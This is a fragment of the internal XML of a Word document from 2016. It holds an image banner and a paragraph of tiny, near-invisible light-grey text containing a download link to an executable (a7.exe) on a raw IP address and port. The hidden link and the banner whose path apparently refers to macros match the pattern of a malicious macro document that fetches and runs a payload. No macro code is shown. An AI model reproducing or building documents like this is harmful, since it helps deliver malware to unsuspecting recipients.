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03" w:rsidRPr="00357D88" w:rsidRDefault="004B6CC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:noProof/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C98A6C" wp14:editId="3BD03F74">
            <wp:extent cx="6570980" cy="852985"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
            <wp:docPr id="1" name="그림 1" descr="C:\Users\0\Desktop\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\Desktop\macr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2" t="55423" r="7454" b="17469"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6626340" cy="86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6E56FA" w:rsidRDefault="006E56FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>http://50.204.72.53:81/Admin/css/a7.exe\</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D85293" w:rsidRPr="006E56FA" w:rsidSect="0076765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DE"/>
    <w:rsid w:val="00007E3D"/>
    <w:rsid w:val="00055732"/>
    <w:rsid w:val="000569C1"/>
    <w:rsid w:val="000B1EAF"/>
    <w:rsid w:val="00102CE9"/>
    <w:rsid w:val="001064CE"/>
    <w:rsid w:val="001758CA"/>
    <w:rsid w:val="001859D7"/>
    <w:rsid w:val="00213094"/>
    <w:rsid w:val="00285FB6"/>
    <w:rsid w:val="002A689B"/>
    <w:rsid w:val="002E3970"/>
    <w:rsid w:val="00322C80"/>
    <w:rsid w:val="00355CEF"/>
    <w:rsid w:val="00357D88"/>
    <w:rsid w:val="003C14A3"/>
    <w:rsid w:val="003D4175"/>
    <w:rsid w:val="003D4E4C"/>
    <w:rsid w:val="00400433"/>
    <w:rsid w:val="00401AA9"/>
    <w:rsid w:val="004125C7"/>
    <w:rsid w:val="00423581"/>
    <w:rsid w:val="004B6CC6"/>
    <w:rsid w:val="004C1586"/>
    <w:rsid w:val="004C5421"/>
    <w:rsid w:val="005411F3"/>
    <w:rsid w:val="005A4499"/>
    <w:rsid w:val="00610ECB"/>
    <w:rsid w:val="006117C5"/>
    <w:rsid w:val="00617DDC"/>
    <w:rsid w:val="006D6EB6"/>
    <w:rsid w:val="006E0CC5"/>
    <w:rsid w:val="006E56FA"/>
    <w:rsid w:val="00767656"/>
    <w:rsid w:val="007C2BCD"/>
    <w:rsid w:val="00864FBB"/>
    <w:rsid w:val="008742AD"/>
    <w:rsid w:val="00874B96"/>
    <w:rsid w:val="00877FF0"/>
    <w:rsid w:val="00895367"/>
    <w:rsid w:val="009210E2"/>
    <w:rsid w:val="00973140"/>
    <w:rsid w:val="00981292"/>
    <w:rsid w:val="00A01528"/>
    <w:rsid w:val="00A66539"/>
    <w:rsid w:val="00AB08DE"/>
    <w:rsid w:val="00AF3821"/>
    <w:rsid w:val="00BB3BFC"/>
    <w:rsid w:val="00BC6BA3"/>
    <w:rsid w:val="00C055C8"/>
    <w:rsid w:val="00C545B6"/>
    <w:rsid w:val="00CA154B"/>
    <w:rsid w:val="00CB1B6E"/>
    <w:rsid w:val="00CC2C0D"/>
    <w:rsid w:val="00D23FBB"/>
    <w:rsid w:val="00D45AF6"/>
    <w:rsid w:val="00D85293"/>
    <w:rsid w:val="00E5454C"/>
    <w:rsid w:val="00E6267D"/>
    <w:rsid w:val="00E64850"/>
    <w:rsid w:val="00ED25FE"/>
    <w:rsid w:val="00F571DA"/>
    <w:rsid w:val="00F84440"/>
    <w:rsid w:val="00F96B03"/>
    <w:rsid w:val="00FD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C2AF9-461C-4950-99F9-E4985291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C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C6"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="en-AU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Anna;AnnaS;Fortek</dc:creator>
  <cp:lastModifiedBy>Admin</cp:lastModifiedBy>
  <cp:revision>114</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-01T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-01T07:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>